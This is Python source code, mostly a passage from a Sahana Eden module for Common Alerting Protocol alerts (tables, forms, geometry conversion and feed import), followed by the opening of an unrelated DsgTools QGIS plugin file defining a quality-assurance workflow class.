requires = IS_EMPTY_OR(
IS_IN_SET(settings.get_cap_languages())
),
),
Field("category", "list:string",
represent = S3Represent(options = cap_info_category_opts,
multiple = True,
),
required = True,
requires = IS_IN_SET(cap_info_category_opts,
multiple = True,
),
widget = S3MultiSelectWidget(),
), # 1 or more allowed
Field("event",
required = True,
),
Field("response_type", "list:string",
represent = S3Represent(options = cap_info_responseType_opts,
multiple = True,
),
requires = IS_IN_SET(cap_info_responseType_opts,
multiple = True),
widget = S3MultiSelectWidget(),
), # 0 or more allowed
Field("priority",
requires = IS_EMPTY_OR(
IS_IN_SET(cap_info_priority_opts)
),
),
Field("urgency",
required = True,
requires = IS_IN_SET(cap_info_urgency_opts),
),
Field("severity",
required = True,
requires = IS_IN_SET(cap_info_severity_opts),
),
Field("certainty",
required = True,
requires = IS_IN_SET(cap_info_certainty_opts),
),
Field("audience", "text"),
Field("event_code", "text",
default = settings.get_cap_event_codes(),
represent = S3KeyValueWidget.represent,
widget = S3KeyValueWidget(),
),
s3_datetime("effective"),
s3_datetime("onset"),
s3_datetime("expires",
past = 0,
),
Field("sender_name"),
Field("headline"),
Field("description", "text"),
Field("instruction", "text"),
Field("contact", "text"),
Field("web",
requires = IS_EMPTY_OR(IS_URL()),
),
Field("parameter", "text",
default = settings.get_cap_parameters(),
label = T("Parameters"),
represent = S3KeyValueWidget.represent,
widget = S3KeyValueWidget(),
),
*s3_meta_fields())
info_labels = cap_info_labels()
for field in info_labels:
db.cap_info[field].label = info_labels[field]
if crud_strings["cap_template_info"]:
crud_strings[tablename] = crud_strings["cap_template_info"]
else:
ADD_INFO = T("Add alert information")
crud_strings[tablename] = Storage(
label_create = ADD_INFO,
title_display = T("Alert information"),
title_list = T("Information entries"),
title_update = T("Update alert information"), # this will create a new "Update" alert?
title_upload = T("Import alert information"),
subtitle_list = T("Listing of alert information items"),
label_list_button = T("List information entries"),
label_delete_button = T("Delete Information"),
msg_record_created = T("Alert information created"),
msg_record_modified = T("Alert information modified"),
msg_record_deleted = T("Alert information deleted"),
msg_list_empty = T("No alert information to show"))
info_represent = S3Represent(lookup = tablename,
fields = ["language", "headline"],
field_sep = " - ")
info_id = S3ReusableField("info_id", "reference %s" % tablename,
label = T("Information Segment"),
ondelete = "CASCADE",
represent = info_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_info.id",
info_represent)
),
sortby = "identifier",
)
configure(tablename,
#create_next = URL(f="info", args=["[id]", "area"]),
onaccept = self.info_onaccept,
)
# Components
add_components(tablename,
cap_resource = "info_id",
cap_area = "info_id",
)
# ---------------------------------------------------------------------
# CAP Resource segments
#
# Resource elements sit inside the Info segment of the export XML
# - however in most cases these would be common across all Infos, so in
# our internal UI we link these primarily to the Alert but still
# allow the option to differentiate by Info
#
tablename = "cap_resource"
define_table(tablename,
alert_id(writable = False,
),
info_id(),
self.super_link("doc_id", "doc_entity"),
Field("resource_desc",
requires = IS_NOT_EMPTY(),
),
Field("mime_type",
requires = IS_NOT_EMPTY(),
),
Field("size", "integer",
writable = False,
),
Field("uri",
# needs a special validation
writable = False,
),
#Field("file", "upload"),
Field("deref_uri", "text",
readable = False,
writable = False,
),
Field("digest",
writable = False,
),
*s3_meta_fields())
# CRUD Strings
crud_strings[tablename] = Storage(
label_create = T("Add Resource"),
title_display = T("Alert Resource"),
title_list = T("Resources"),
title_update = T("Edit Resource"),
subtitle_list = T("List Resources"),
label_list_button = T("List Resources"),
label_delete_button = T("Delete Resource"),
msg_record_created = T("Resource added"),
msg_record_modified = T("Resource updated"),
msg_record_deleted = T("Resource deleted"),
msg_list_empty = T("No resources currently defined for this alert"))
# @todo: complete custom form
crud_form = S3SQLCustomForm(#"name",
"info_id",
"resource_desc",
S3SQLInlineComponent("image",
label=T("Image"),
fields=["file",
],
),
S3SQLInlineComponent("document",
label=T("Document"),
fields=["file",
],
),
)
configure(tablename,
super_entity = "doc_entity",
crud_form = crud_form,
# Shouldn't be required if all UI actions go through alert controller & XSLT configured appropriately
create_onaccept = update_alert_id(tablename),
)
# ---------------------------------------------------------------------
# CAP Area segments
#
# Area elements sit inside the Info segment of the export XML
# - however in most cases these would be common across all Infos, so in
# our internal UI we link these primarily to the Alert but still
# allow the option to differentiate by Info
#
# Each <area> can have multiple elements which are one of <polygon>,
# <circle>, or <geocode>.
# <polygon> and <circle> are explicit geometry elements.
# <geocode> is a key-value pair in which the key is a standard
# geocoding system like SAME, FIPS, ZIP, and the value is a defined
# value in that system. The region described by the <area> is the
# union of the areas described by the individual elements, but the
# CAP spec advises that, if geocodes are included, the concrete
# geometry elements should outline the area specified by the geocodes,
# as not all recipients will have access to the meanings of the
# geocodes. However, since geocodes are a compact way to describe an
# area, it may be that they will be used without accompanying geometry,
# so we should not count on having <polygon> or <circle>.
#
# Geometry elements are each represented by a gis_location record, and
# linked to the cap_area record via the cap_area_location link table.
# For the moment, <circle> objects are stored with the center in the
# gis_location's lat, lon, and radius (in km) as a tag "radius" and
# value. ToDo: Later, we will add CIRCLESTRING WKT.
#
# Geocode elements are currently stored as key value pairs in the
# cap_area record.
#
# <area> can also specify a minimum altitude and maximum altitude
# ("ceiling"). These are stored in explicit fields for now, but could
# be replaced by key value pairs, if it is found that they are rarely
# used.
#
# (An alternative would be to have cap_area link to a gis_location_group
# record. In that case, the geocode tags could be stored in the
# gis_location_group's overall gis_location element's tags. The altitude
# could be stored in the overall gis_location's elevation, with ceiling
# stored in a tag. We could consider adding a maximum elevation field.)
tablename = "cap_area"
define_table(tablename,
alert_id(writable = False,
),
info_id(),
Field("name",
label = T("Area description"),
required = True,
),
Field("altitude", "integer"), # Feet above Sea-level in WGS84 (Specific or Minimum is using a range)
Field("ceiling", "integer"), # Feet above Sea-level in WGS84 (Maximum)
*s3_meta_fields())
# CRUD Strings
crud_strings[tablename] = Storage(
label_create = T("Add Area"),
title_display = T("Alert Area"),
title_list = T("Areas"),
title_update = T("Edit Area"),
subtitle_list = T("List Areas"),
label_list_button = T("List Areas"),
label_delete_button = T("Delete Area"),
msg_record_created = T("Area added"),
msg_record_modified = T("Area updated"),
msg_record_deleted = T("Area deleted"),
msg_list_empty = T("No areas currently defined for this alert"))
crud_form = S3SQLCustomForm("name",
"info_id",
# Not yet working with default formstyle or multiple=True
#S3SQLInlineComponent("location",
# name = "location",
# label = "",
# multiple = False,
# fields = [("", "location_id")],
# ),
S3SQLInlineComponent("tag",
name = "tag",
label = "",
fields = ["tag",
"value",
],
),
"altitude",
"ceiling",
)
area_represent = S3Represent(lookup=tablename)
configure(tablename,
#create_next = URL(f="area", args=["[id]", "location"]),
# Shouldn't be required if all UI actions go through alert controller & XSLT configured appropriately
create_onaccept = update_alert_id(tablename),
crud_form = crud_form,
)
# Components
add_components(tablename,
cap_area_location = {"name": "location",
"joinby": "area_id",
},
cap_area_tag = {"name": "tag",
"joinby": "area_id",
},
)
area_id = S3ReusableField("area_id", "reference %s" % tablename,
label = T("Area"),
ondelete = "CASCADE",
represent = area_represent,
requires = IS_ONE_OF(db, "cap_area.id",
area_represent),
)
# ToDo: Use a widget tailored to entering <polygon> and <circle>.
# Want to be able to enter them by drawing on the map.
# Also want to allow selecting existing locations that have
# geometry, maybe with some filtering so the list isn't cluttered
# with irrelevant locations.
tablename = "cap_area_location"
define_table(tablename,
alert_id(readable = False,
writable = False,
),
area_id(),
self.gis_location_id(
widget = S3LocationSelector(points = False,
polygons = True,
show_map = True,
show_address = False,
show_postcode = False,
),
),
)
# CRUD Strings
crud_strings[tablename] = Storage(
label_create = T("Add Location"),
title_display = T("Alert Location"),
title_list = T("Locations"),
title_update = T("Edit Location"),
subtitle_list = T("List Locations"),
label_list_button = T("List Locations"),
label_delete_button = T("Delete Location"),
msg_record_created = T("Location added"),
msg_record_modified = T("Location updated"),
msg_record_deleted = T("Location deleted"),
msg_list_empty = T("No locations currently defined for this alert"))
configure(tablename,
# Shouldn't be required if all UI actions go through alert controller & XSLT configured appropriately
create_onaccept = update_alert_id(tablename),
)
# ---------------------------------------------------------------------
# Area Tags
# - Key-Value extensions
# - Used to hold for geocodes: key is the geocode system name, and
# value is the specific value for this area.
# - Could store other values here as well, to avoid dedicated fields
# in cap_area for rarely-used items like altitude and ceiling, but
# would have to distinguish those from geocodes.
#
# ToDo: Provide a mechanism for pre-loading geocodes that are not tied
# to individual areas.
# ToDo: Allow sharing the key-value pairs. Cf. Ruby on Rails tagging
# systems such as acts-as-taggable-on, which has a single table of tags
# used by all classes. Each tag record has the class and field that the
# tag belongs to, as well as the tag string. We'd want tag and value,
# but the idea is the same: There would be a table with tag / value
# pairs, and individual cap_area, event_event, org_whatever records
# would link to records in the tag table. So we actually would not have
# duplicate tag value records as we do now.
tablename = "cap_area_tag"
define_table(tablename,
area_id(),
# ToDo: Allow selecting from a dropdown list of pre-defined
# geocode system names.
Field("tag",
label = T("Geocode Name"),
),
# ToDo: Once the geocode system is selected, fetch a list
# of current values for that geocode system. Allow adding
# new values, e.g. with combo box menu.
Field("value",
label = T("Value"),
),
s3_comments(),
*s3_meta_fields())
#configure(tablename,
# deduplicate = self.cap_area_tag_deduplicate,
# )
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
return dict(cap_alert_id = alert_id,
cap_alert_represent = alert_represent,
cap_area_represent = area_represent,
cap_info_represent = info_represent,
cap_info_category_opts = cap_info_category_opts
)
# -------------------------------------------------------------------------
@staticmethod
def generate_identifier():
"""
Generate an identifier for a new form
"""
db = current.db
table = db.cap_alert
r = db().select(table.id,
limitby=(0, 1),
orderby=~table.id).first()
_time = datetime.datetime.strftime(datetime.datetime.utcnow(), "%Y/%m/%dT%H:%M:%S")
if r:
next_id = int(r.id) + 1
else:
next_id = 1
# Format: prefix-time+-timezone+sequence-suffix
settings = current.deployment_settings
prefix = settings.get_cap_identifier_prefix() or current.xml.domain
suffix = settings.get_cap_identifier_suffix()
return "%s-%s-%d%s%s" % \
(prefix, _time, next_id, ["", "-"][bool(suffix)], suffix)
# -------------------------------------------------------------------------
@staticmethod
def generate_sender():
"""
Generate a sender for a new form
"""
try:
user_id = current.auth.user.id
except AttributeError:
return ""
return "%s/%d" % (current.xml.domain, user_id)
# -------------------------------------------------------------------------
@staticmethod
def template_represent(id, row=None):
"""
Represent an alert template concisely
"""
if row:
id = row.id
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.cap_alert
row = db(table.id == id).select(table.is_template,
table.template_title,
# left = table.on(table.id == table.parent_item_category_id), Doesn't work
limitby=(0, 1)).first()
try:
# @ToDo: Should get headline from "info"?
if row.is_template:
return row.template_title
else:
return s3db.cap_alert_represent(id)
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def list_string_represent(string, fmt=lambda v: v):
try:
if isinstance(string, list):
return ", ".join([fmt(i) for i in string])
elif isinstance(string, basestring):
return ", ".join([fmt(i) for i in string[1:-1].split("|")])
except IndexError:
return current.messages.UNKNOWN_OPT
return ""
# -------------------------------------------------------------------------
@staticmethod
def cap_alert_form_validation(form):
"""
On Validation for CAP alert form
"""
form_vars = form.vars
if form_vars.get("scope") == "Private" and not form_vars.get("addresses"):
form.errors["addresses"] = \
current.T("'Recipients' field mandatory in case of 'Private' scope")
return
# -------------------------------------------------------------------------
@staticmethod
def info_onaccept(form):
"""
After DB I/O
"""
if "vars" in form:
form_vars = form.vars
elif "id" in form:
form_vars = form
elif hasattr(form, "vars"):
form_vars = form.vars
else:
form_vars = form
info_id = form_vars.id
if not info_id:
return
db = current.db
atable = db.cap_alert
itable = db.cap_info
info = db(itable.id == info_id).select(itable.alert_id,
limitby=(0, 1)).first()
if info:
alert_id = info.alert_id
if alert_id and cap_alert_is_template(alert_id):
info.update(is_template = True)
return True
# =============================================================================
def cap_info_labels():
"""
Labels for CAP info segments
"""
T = current.T
return dict(language=T("Language"),
category=T("Category"),
event=T("Event"),
response_type=T("Response type"),
urgency=T("Urgency"),
severity=T("Severity"),
certainty=T("Certainty"),
audience=T("Audience"),
event_code=T("Event code"),
effective=T("Effective"),
onset=T("Onset"),
expires=T("Expires at"),
sender_name=T("Sender's name"),
headline=T("Headline"),
description=T("Description"),
instruction=T("Instruction"),
web=T("URL"),
contact=T("Contact information"),
parameter=T("Parameters")
)
# =============================================================================
def cap_alert_is_template(alert_id):
"""
Tell whether an alert entry is a template
"""
if not alert_id:
return False
table = current.s3db.cap_alert
query = (table.id == alert_id)
r = current.db(query).select(table.is_template,
limitby=(0, 1)).first()
return r and r.is_template
# =============================================================================
def cap_rheader(r):
""" Resource Header for CAP module """
rheader = None
if r.representation == "html":
record = r.record
if record:
T = current.T
s3db = current.s3db
tablename = r.tablename
if tablename == "cap_alert":
record_id = record.id
table = s3db.cap_info
query = (table.alert_id == record_id)
row = current.db(query).select(table.id,
limitby=(0, 1)).first()
if record.is_template:
if not (row and row.id):
error = DIV(T("An alert needs to contain at least one info item."),
_class="error")
else:
error = ""
tabs = [(T("Template"), None),
(T("Information template"), "info"),
#(T("Area"), "area"),
#(T("Resource Files"), "resource"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
rheader = DIV(TABLE(TR(TH("%s: " % T("Template")),
TD(A(S3CAPModel.template_represent(record_id, record),
_href=URL(c="cap", f="template",
args=[record_id, "update"]))),
),
),
rheader_tabs,
error
)
else:
if not (row and row.id):
error = DIV(T("You need to create at least one alert information item in order to be able to broadcast this alert!"),
_class="error")
export_btn = ""
else:
error = ""
export_btn = A(DIV(_class="export_cap_large"),
_href=URL(c="cap", f="alert", args=["%s.cap" % record_id]),
_target="_blank",
)
table = s3db.cap_area
query = (table.alert_id == record_id)
row = current.db(query).select(table.id,
limitby=(0, 1)).first()
if row:
# We have an Area, so we can add Locations
location_tab = (T("Location"), "location")
else:
location_tab = ""
tabs = [(T("Alert Details"), None),
(T("Information"), "info"),
(T("Area"), "area"),
location_tab,
(T("Resource Files"), "resource"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
rheader = DIV(TABLE(TR(TH("%s: " % T("Alert")),
TD(A(s3db.cap_alert_represent(record_id, record),
_href=URL(c="cap", f="alert",
args=[record_id, "update"]))),
),
TR(export_btn)
),
rheader_tabs,
error
)
elif tablename == "cap_area":
# Shouldn't ever be called
tabs = [(T("Area"), None),
(T("Locations"), "location"),
#(T("Geocodes"), "tag"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
rheader = DIV(TABLE(TR(TH("%s: " % T("Alert")),
TD(A(s3db.cap_alert_represent(record.alert_id),
_href=URL(c="cap", f="alert",
args=[record.id, "update"])))
),
TR(TH("%s: " % T("Information")),
TD(A(s3db.cap_info_represent(record.info_id),
_href=URL(c="cap", f="info",
args=[record.info_id, "update"]))),
),
TR(TH("%s: " % T("Area")),
TD(A(s3db.cap_area_represent(record.id, record),
_href=URL(c="cap", f="area",
args=[record.id, "update"]))),
),
),
rheader_tabs
)
elif tablename == "cap_area_location":
# Shouldn't ever be called
# We need the rheader only for the link back to the area.
rheader = DIV(TABLE(TR(TH("%s: " % T("Area")),
TD(A(s3db.cap_area_represent(record.area_id),
_href=URL(c="cap", f="area",
args=[record.area_id, "update"]))),
),
))
elif tablename == "cap_info":
# Shouldn't ever be called
tabs = [(T("Information"), None),
(T("Resource Files"), "resource"),
]
if cap_alert_is_template(record.alert_id):
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR(TH("%s: " % T("Template")),
TD(A(S3CAPModel.template_represent(record.alert_id),
_href=URL(c="cap", f="template",
args=[record.alert_id, "update"]))),
),
TR(TH("%s: " % T("Info template")),
TD(A(s3db.cap_info_represent(record.id, record),
_href=URL(c="cap", f="info",
args=[record.id, "update"]))),
)
),
rheader_tabs,
_class="cap_info_template_form"
)
current.response.s3.js_global.append('''i18n.cap_locked="%s"''' % T("Locked"))
else:
tabs.insert(1, (T("Areas"), "area"))
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR(TH("%s: " % T("Alert")),
TD(A(s3db.cap_alert_represent(record.alert_id),
_href=URL(c="cap", f="alert",
args=[record.alert_id, "update"]))),
),
TR(TH("%s: " % T("Information")),
TD(A(s3db.cap_info_represent(record.id, record),
_href=URL(c="cap", f="info",
args=[record.id, "update"]))),
)
),
rheader_tabs
)
return rheader
# =============================================================================
def update_alert_id(tablename):
""" On-accept for area and resource records """
def func(form):
if "vars" in form:
form_vars = form.vars
elif "id" in form:
form_vars = form
elif hasattr(form, "vars"):
form_vars = form.vars
else:
form_vars = form
if form_vars.get("alert_id", None):
# Nothing to do
return
# Look up from the info/area
_id = form_vars.id
if not _id:
return
db = current.db
table = db[tablename]
if tablename == "cap_area_location":
area_id = form_vars.get("area_id", None)
if not area_id:
# Get the full record
item = db(table.id == _id).select(table.alert_id,
table.area_id,
limitby=(0, 1)).first()
try:
alert_id = item.alert_id
area_id = item.area_id
except:
# Nothing we can do
return
if alert_id:
# Nothing to do
return
atable = db.cap_area
area = db(atable.id == area_id).select(atable.alert_id,
limitby=(0, 1)).first()
try:
alert_id = area.alert_id
except:
# Nothing we can do
return
else:
info_id = form_vars.get("info_id", None)
if not info_id:
# Get the full record
item = db(table.id == _id).select(table.alert_id,
table.info_id,
limitby=(0, 1)).first()
try:
alert_id = item.alert_id
info_id = item.info_id
except:
# Nothing we can do
return
if alert_id:
# Nothing to do
return
itable = db.cap_info
info = db(itable.id == info_id).select(itable.alert_id,
limitby=(0, 1)).first()
try:
alert_id = info.alert_id
except:
# Nothing we can do
return
db(table.id == _id).update(alert_id = alert_id)
return func
# =============================================================================
def cap_gis_location_xml_post_parse(element, record):
"""
UNUSED - done in XSLT
Convert CAP polygon representation to WKT; extract circle lat lon.
Latitude and longitude in CAP are expressed as signed decimal values in
coordinate pairs:
latitude,longitude
The circle text consists of:
latitude,longitude radius
where the radius is in km.
Polygon text consists of a space separated sequence of at least 4
coordinate pairs where the first and last are the same.
lat1,lon1 lat2,lon2 lat3,lon3 ... lat1,lon1
"""
# @ToDo: Extract altitude and ceiling from the enclosing <area>, and
# compute an elevation value to apply to all enclosed gis_locations.
cap_polygons = element.xpath("cap_polygon")
if cap_polygons:
cap_polygon_text = cap_polygons[0].text
# CAP polygons and WKT have opposite separator conventions:
# CAP has spaces between coordinate pairs and within pairs the
# coordinates are separated by comma, and vice versa for WKT.
# Unfortunately, CAP and WKT (as we use it) also have opposite
# orders of lat and lon. CAP has lat lon, WKT has lon lat.
# Both close the polygon by repeating the first point.
cap_points_text = cap_polygon_text.split()
cap_points = [cpoint.split(",") for cpoint in cap_points_text]
# @ToDo: Should we try interpreting all the points as decimal numbers,
# and failing validation if they're wrong?
wkt_points = ["%s %s" % (cpoint[1], cpoint[0]) for cpoint in cap_points]
wkt_polygon_text = "POLYGON ((%s))" % ", ".join(wkt_points)
record.wkt = wkt_polygon_text
return
cap_circle_values = element.xpath("resource[@name='gis_location_tag']/data[@field='tag' and text()='cap_circle']/../data[@field='value']")
if cap_circle_values:
cap_circle_text = cap_circle_values[0].text
coords, radius = cap_circle_text.split()
lat, lon = coords.split(",")
try:
# If any of these fail to interpret as numbers, the circle was
# badly formatted. For now, we don't try to fail validation,
# but just don't set the lat, lon.
lat = float(lat)
lon = float(lon)
radius = float(radius)
except ValueError:
return
record.lat = lat
record.lon = lon
# Add a bounding box for the given radius, if it is not zero.
if radius > 0.0:
bbox = current.gis.get_bounds_from_radius(lat, lon, radius)
record.lat_min = bbox["lat_min"]
record.lon_min = bbox["lon_min"]
record.lat_max = bbox["lat_max"]
record.lon_max = bbox["lon_max"]
# =============================================================================
def cap_gis_location_xml_post_render(element, record):
"""
UNUSED - done in XSLT
Convert Eden WKT polygon (and eventually circle) representation to
CAP format and provide them in the rendered s3xml.
Not all internal formats have a parallel in CAP, but an effort is made
to provide a resonable substitute:
Polygons are supported.
Circles that were read in from CAP (and thus carry the original CAP
circle data) are supported.
Multipolygons are currently rendered as their bounding box.
Points are rendered as zero radius circles.
Latitude and longitude in CAP are expressed as signed decimal values in
coordinate pairs:
latitude,longitude
The circle text consists of:
latitude,longitude radius
where the radius is in km.
Polygon text consists of a space separated sequence of at least 4
coordinate pairs where the first and last are the same.
lat1,lon1 lat2,lon2 lat3,lon3 ... lat1,lon1
"""
# @ToDo: Can we rely on gis_feature_type == 3 to tell if the location is a
# polygon, or is it better to look for POLYGON in the wkt? For now, check
# both.
# @ToDo: CAP does not support multipolygons. Do we want to extract their
# outer polygon if passed MULTIPOLYGON wkt? For now, these are exported
# with their bounding box as the polygon.
# @ToDo: What if a point (gis_feature_type == 1) that is not a CAP circle
# has a non-point bounding box? Should it be rendered as a polygon for
# the bounding box?
try:
from lxml import etree
except:
# This won't fail, since we're in the middle of processing xml.
return
SubElement = etree.SubElement
s3xml = current.xml
TAG = s3xml.TAG
RESOURCE = TAG["resource"]
DATA = TAG["data"]
ATTRIBUTE = s3xml.ATTRIBUTE
NAME = ATTRIBUTE["name"]
FIELD = ATTRIBUTE["field"]
VALUE = ATTRIBUTE["value"]
loc_tablename = "gis_location"
tag_tablename = "gis_location_tag"
tag_fieldname = "tag"
val_fieldname = "value"
polygon_tag = "cap_polygon"
circle_tag = "cap_circle"
fallback_polygon_tag = "cap_polygon_fallback"
fallback_circle_tag = "cap_circle_fallback"
def __cap_gis_location_add_polygon(element, cap_polygon_text, fallback=False):
"""
Helper for cap_gis_location_xml_post_render that adds the CAP polygon
data to the current element in a gis_location_tag element.
"""
# Make a gis_location_tag.
tag_resource = SubElement(element, RESOURCE)
tag_resource.set(NAME, tag_tablename)
tag_field = SubElement(tag_resource, DATA)
# Add tag and value children.
tag_field.set(FIELD, tag_fieldname)
if fallback:
tag_field.text = fallback_polygon_tag
else:
tag_field.text = polygon_tag
val_field = SubElement(tag_resource, DATA)
val_field.set(FIELD, val_fieldname)
val_field.text = cap_polygon_text
def __cap_gis_location_add_circle(element, lat, lon, radius, fallback=False):
"""
Helper for cap_gis_location_xml_post_render that adds CAP circle
data to the current element in a gis_location_tag element.
"""
# Make a gis_location_tag.
tag_resource = SubElement(element, RESOURCE)
tag_resource.set(NAME, tag_tablename)
tag_field = SubElement(tag_resource, DATA)
# Add tag and value children.
tag_field.set(FIELD, tag_fieldname)
if fallback:
tag_field.text = fallback_circle_tag
else:
tag_field.text = circle_tag
val_field = SubElement(tag_resource, DATA)
val_field.set(FIELD, val_fieldname)
# Construct a CAP circle string: latitude,longitude radius
cap_circle_text = "%s,%s %s" % (lat, lon, radius)
val_field.text = cap_circle_text
# Sort out the geometry case by wkt, CAP tags, gis_feature_type, bounds,...
# Check the two cases for CAP-specific locations first, as those will have
# definite export values. For others, we'll attempt to produce either a
# circle or polygon: Locations with a bounding box will get a box polygon,
# points will get a zero-radius circle.
# Currently wkt is stripped out of gis_location records right here:
# https://github.com/flavour/eden/blob/master/modules/s3/s3resource.py#L1332
# https://github.com/flavour/eden/blob/master/modules/s3/s3resource.py#L1426
# https://github.com/flavour/eden/blob/master/modules/s3/s3resource.py#L3152
# Until we provide a way to configure that choice, this will not work for
# polygons.
wkt = record.get("wkt", None)
# WKT POLYGON: Although there is no WKT spec, according to every reference
# that deals with nested polygons, the outer, enclosing, polygon must be
# listed first. Hence, we extract only the first polygon, as CAP has no
# provision for nesting.
if wkt and wkt.startswith("POLYGON"):
# ToDo: Is it sufficient to test for adjacent (( to find the start of
# the polygon, or might there be whitespace between them?
start = wkt.find("((")
end = wkt.find(")")
if start >=0 and end >=0:
polygon_text = wkt[start + 2 : end]
points_text = polygon_text.split(",")
points = [p.split() for p in points_text]
cap_points_text = ["%s,%s" % (point[1], point[0]) for point in points]
cap_polygon_text = " ".join(cap_points_text)
__cap_gis_location_add_polygon(element, cap_polygon_text)
return
# Fall through if the wkt string was mal-formed.
# CAP circle stored in a gis_location_tag with tag = cap_circle.
# If there is a cap_circle tag, we don't need to do anything further, as
# export.xsl will use it. However, we don't know if there is a cap_circle
# tag...
#
# @ToDo: The export calls xml_post_render after processing a resource's
# fields, but before its components are added as children in the xml tree.
# If this were delayed til after the components were added, we could look
# there for the cap_circle gis_location_tag record. Since xml_post_parse
# isn't in use yet (except for this), maybe we could look at moving it til
# after the components?
#
# For now, with the xml_post_render before components: We could do a db
# query to check for a real cap_circle tag record, and not bother with
# creating fallbacks from bounding box or point...but we don't have to.
# Instead, just go ahead and add the fallbacks under different tag names,
# and let the export.xsl sort them out. This only wastes a little time
# compared to a db query.
# ToDo: MULTIPOLYGON -- Can stitch together the outer polygons in the
# multipolygon, but would need to assure all were the same handedness.
# The remaining cases are for locations that don't have either polygon wkt
# or a cap_circle tag.
# Bounding box: Make a four-vertex polygon from the bounding box.
# This is a fallback, as if there is a circle tag, we'll use that.
lon_min = record.get("lon_min", None)
lon_max = record.get("lon_max", None)
lat_min = record.get("lat_min", None)
lat_max = record.get("lat_max", None)
if lon_min and lon_max and lat_min and lat_max and \
(lon_min != lon_max) and (lat_min != lat_max):
# Although there is no WKT requirement, arrange the points in
# counterclockwise order. Recall format is:
# lat1,lon1 lat2,lon2 ... latN,lonN, lat1,lon1
cap_polygon_text = \
"%(lat_min)s,%(lon_min)s %(lat_min)s,%(lon_max)s %(lat_max)s,%(lon_max)s %(lat_max)s,%(lon_min)s %(lat_min)s,%(lon_min)s" \
% {"lon_min": lon_min,
"lon_max": lon_max,
"lat_min": lat_min,
"lat_max": lat_max}
__cap_gis_location_add_polygon(element, cap_polygon_text, fallback=True)
return
# WKT POINT or location with lat, lon: This can be rendered as a
# zero-radius circle.
# Q: Do we put bounding boxes around POINT locations, and are they
# meaningful?
lat = record.get("lat", None)
lon = record.get("lon", None)
if not lat or not lon:
# Look for POINT.
if wkt and wkt.startswith("POINT"):
start = wkt.find("(")
end = wkt.find(")")
if start >=0 and end >=0:
point_text = wkt[start + 2 : end]
point = point_text.split()
try:
lon = float(point[0])
lat = float(point[1])
except ValueError:
pass
if lat and lon:
# Add a (fallback) circle with zero radius.
__cap_gis_location_add_circle(element, lat, lon, 0, True)
return
# ToDo: Other WKT.
# Did not find anything to use. Presumably the area has a text description.
return
# -----------------------------------------------------------------------------
class CAPImportFeed(S3Method):
"""
Import CAP alerts from a URL
"""
# -------------------------------------------------------------------------
@staticmethod
def apply_method(r, **attr):
"""
Apply method.
@param r: the S3Request
@param attr: controller options for this request
"""
if r.representation == "html":
T = current.T
request = current.request
response = current.response
title = T("Import from Feed URL")
# @ToDo: use Formstyle
form = FORM(
TABLE(
TR(TD(DIV(B("%s:" % T("URL")),
SPAN(" *", _class="req"))),
TD(INPUT(_type="text", _name="url",
_id="url", _value="")),
TD(),
),
TR(TD(B("%s: " % T("User"))),
TD(INPUT(_type="text", _name="user",
_id="user", _value="")),
TD(),
),
TR(TD(B("%s: " % T("Password"))),
TD(INPUT(_type="text", _name="password",
_id="password", _value="")),
TD(),
),
TR(TD(B("%s: " % T("Ignore Errors?"))),
TD(INPUT(_type="checkbox", _name="ignore_errors",
_id="ignore_errors")),
TD(),
),
TR(TD(),
TD(INPUT(_type="submit", _value=T("Import"))),
TD(),
)
)
)
response.view = "create.html"
output = dict(title=title,
form=form)
if form.accepts(request.vars, current.session):
form_vars = form.vars
url = form_vars.get("url", None)
if not url:
response.error = T("URL is required")
return output
# @ToDo:
username = form_vars.get("username", None)
password = form_vars.get("password", None)
try:
file = fetch(url)
except urllib2.URLError:
response.error = str(sys.exc_info()[1])
return output
except urllib2.HTTPError:
response.error = str(sys.exc_info()[1])
return output
File = StringIO(file)
stylesheet = os.path.join(request.folder, "static", "formats",
"cap", "import.xsl")
xml = current.xml
tree = xml.parse(File)
resource = current.s3db.resource("cap_alert")
s3xml = xml.transform(tree, stylesheet_path=stylesheet,
name=resource.name)
try:
resource.import_xml(s3xml,
ignore_errors=form_vars.get("ignore_errors", None))
except:
response.error = str(sys.exc_info()[1])
else:
import_count = resource.import_count
if import_count:
response.confirmation = "%s %s" % \
(import_count,
T("Alerts successfully imported."))
else:
response.information = T("No Alerts available.")
return output
else:
raise HTTP(501, current.ERROR.BAD_METHOD)
# END =========================================================================
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-08-28
git sha : $Format:%H$
copyright : (C) 2019 by João P. Esperidião - Cartographic Engineer @ Brazilian Army
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os, json
from time import sleep, time
from functools import partial
from qgis.core import (QgsApplication,
QgsProcessingFeedback,
QgsProcessingMultiStepFeedback)
from qgis.PyQt.QtCore import QObject, pyqtSignal
from DsgTools.core.DSGToolsProcessingAlgs.Models.dsgToolsProcessingModel import DsgToolsProcessingModel
class QualityAssuranceWorkflow(QObject):
"""
Works as a multi-model runner. Understands all models' parameters as an
output vector layer.
"""
workflowFinished = pyqtSignal()
haltedOnFlags = pyqtSignal(DsgToolsProcessingModel)
modelStarted = pyqtSignal(DsgToolsProcessingModel)
modelFinished = pyqtSignal(DsgToolsProcessingModel)
modelFinishedWithFlags = pyqtSignal(DsgToolsProcessingModel)
modelFailed = pyqtSignal(DsgToolsProcessingModel)
def __init__(self, parameters, feedback=None):
"""
Class constructor. Materializes an workflow set of parameters.
:param parameters: (dict) map of workflow attributes.
:param feedback: (QgsProcessingFeedback) task progress tracking QGIS
object.
"""
super(QualityAssuranceWorkflow, self).__init__()
msg = self.validateParameters(parameters)
if msg:
raise Exception(
self.tr("Invalid workflow parameter:\n{msg}").format(msg=msg)
)
self._param = parameters
self._modelOrderMap = dict()
self.output = dict()
self.feedback = feedback or QgsProcessingFeedback()
